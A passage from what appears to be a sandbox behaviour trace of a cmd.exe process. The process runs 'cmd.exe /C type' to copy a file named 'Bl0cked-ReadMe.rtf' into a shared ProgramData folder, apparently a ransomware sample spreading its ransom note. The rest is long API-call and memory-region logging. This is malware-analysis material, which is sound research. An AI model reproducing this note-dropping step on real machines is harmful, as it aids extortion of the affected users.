QB") returned 0x10 [0118.841] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x425120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0118.841] _setmode (_FileHandle=1, _Mode=32768) 
returned 16384 [0118.841] _write (in: _FileHandle=1, _Buf=0x425120*, _MaxCharCount=0x10 | out: _Buf=0x425120*) returned 16 [0118.841] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.841] LocalFree (hMem=0x425120) returned 0x0 [0118.841] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x12f27c, nSize=0x0, Arguments=0x12f278 | out: lpBuffer="\x10 \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9315 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9316 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9317 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9318 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 9319 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 9320 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9321 start_va = 
0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9322 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9323 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 9324 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9335 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9336 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9337 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9338 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 9339 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 9340 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 9341 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9342 start_va = 0x76480000 
end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9343 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9344 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9345 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9346 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9347 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9348 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9349 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 9350 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9351 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = 
"\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9352 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 9353 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 9354 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 9355 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 9356 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 9357 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 9358 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 120 os_tid = 0xf38 [0119.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd14 | out: lpSystemTimeAsFileTime=0x1efd14*(dwLowDateTime=0x844fcce0, dwHighDateTime=0x1d440a9)) [0119.383] GetCurrentProcessId () returned 0xf34 [0119.383] GetCurrentThreadId () returned 0xf38 [0119.383] GetTickCount () returned 0x2845b [0119.383] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd0c | out: lpPerformanceCount=0x1efd0c*=17617187332) returned 1 [0119.383] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0119.384] __set_app_type (_Type=0x1) [0119.384] __p__fmode () returned 0x76b331f4 [0119.384] __p__commode () returned 0x76b331fc [0119.384] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0119.384] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, 
_StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0119.384] GetCurrentThreadId () returned 0xf38 [0119.384] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf38) returned 0x38 [0119.384] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0119.384] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0119.384] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.385] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.385] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efca4 | out: phkResult=0x1efca4*=0x0) returned 0x2 [0119.385] VirtualQuery (in: lpAddress=0x1efcdb, lpBuffer=0x1efc74, dwLength=0x1c | out: lpBuffer=0x1efc74*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.385] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efc74, dwLength=0x1c | out: lpBuffer=0x1efc74*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0119.385] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efc74, dwLength=0x1c | out: lpBuffer=0x1efc74*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0119.385] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efc74, dwLength=0x1c | out: lpBuffer=0x1efc74*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.385] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efc74, dwLength=0x1c | out: lpBuffer=0x1efc74*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, 
RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0119.385] GetConsoleOutputCP () returned 0x1b5 [0119.385] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.385] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0119.385] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.385] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0119.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.386] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0119.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.386] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0119.386] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.386] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0119.386] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.386] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0119.387] GetEnvironmentStringsW () returned 0x3e0198* [0119.387] FreeEnvironmentStringsW (penv=0x3e0198) returned 1 [0119.387] GetEnvironmentStringsW () returned 0x3e0198* [0119.387] FreeEnvironmentStringsW (penv=0x3e0198) returned 1 [0119.387] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec14 | out: phkResult=0x1eec14*=0x40) returned 0x0 [0119.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0xc0, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.387] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x1, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", 
lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0x1, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x0, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.387] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x40, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x40, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0x40, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.388] RegCloseKey (hKey=0x40) returned 0x0 [0119.388] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec14 | out: phkResult=0x1eec14*=0x40) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0x40, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x1, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, 
lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0x1, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x0, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x9, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x9, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0x9, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.388] RegCloseKey (hKey=0x40) returned 0x0 [0119.388] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635f [0119.388] srand (_Seed=0x5b88635f) [0119.388] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf\"" [0119.388] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf\"" [0119.389] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.389] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0119.389] 
GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.389] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.389] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.389] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0119.389] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0119.389] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0119.389] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0119.389] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0119.390] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0119.390] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0119.390] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0119.390] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0119.390] GetEnvironmentStringsW () returned 0x3e22e8* [0119.390] FreeEnvironmentStringsW (penv=0x3e22e8) returned 1 [0119.390] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.390] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.390] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0119.390] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0119.390] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0119.390] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0119.390] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0119.390] _wcsicmp (_String1="KEYS", _String2="TIME") 
returned -9 [0119.390] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0119.390] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0119.391] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef9e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.391] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef9e0, lpFilePart=0x1ef9dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef9dc*="Desktop") returned 0x18 [0119.391] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0119.391] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef75c | out: lpFindFileData=0x1ef75c) returned 0x3e0028 [0119.391] FindClose (in: hFindFile=0x3e0028 | out: hFindFile=0x3e0028) returned 1 [0119.391] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef75c | out: lpFindFileData=0x1ef75c) returned 0x3e0028 [0119.391] FindClose (in: hFindFile=0x3e0028 | out: hFindFile=0x3e0028) returned 1 [0119.391] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef75c | out: lpFindFileData=0x1ef75c) returned 0x3e0028 [0119.392] FindClose (in: hFindFile=0x3e0028 | out: hFindFile=0x3e0028) returned 1 [0119.392] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0119.392] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0119.392] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0119.392] GetEnvironmentStringsW () returned 0x3e2b08* [0119.392] FreeEnvironmentStringsW (penv=0x3e2b08) returned 1 [0119.392] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.393] GetConsoleOutputCP () returned 0x1b5 [0119.449] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.449] GetUserDefaultLCID () returned 0x409 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efb20, cchData=128 | out: lpLCData="0") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efb20, cchData=128 | out: lpLCData="0") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efb20, cchData=128 | out: lpLCData="1") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0119.450] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0119.451] GetConsoleTitleW (in: lpConsoleTitle=0x3d08f0, 
nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.451] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0119.451] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0119.451] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0119.452] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0119.452] _wcsicmp (_String1="type", _String2=")") returned 75 [0119.452] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0119.452] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0119.453] _wcsicmp (_String1="IF", _String2="type") returned -11 [0119.453] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0119.453] _wcsicmp (_String1="REM", _String2="type") returned -2 [0119.453] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0119.457] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.457] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.457] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.457] GetFileType (hFile=0x7) returned 0x2 [0119.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0119.458] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1efa18 | out: lpMode=0x1efa18) returned 1 [0119.458] _dup (_FileHandle=1) returned 3 [0119.458] _close (_FileHandle=1) returned 0 [0119.458] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0119.458] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\publis~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef9e8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0119.459] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0119.459] GetConsoleTitleW (in: lpConsoleTitle=0x1ef818, 
nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.460] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0119.460] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0119.460] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0119.460] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0119.462] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.462] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1ef37c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef37c) returned 0x3d0e90 [0119.463] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0119.463] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0119.463] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0119.463] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ee288, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0119.463] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0119.463] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.463] GetFileType (hFile=0x54) returned 0x1 [0119.463] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.463] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ee2e0 | out: lpFileSizeHigh=0x1ee2e0*=0x0) returned 0x1632 [0119.463] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.463] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 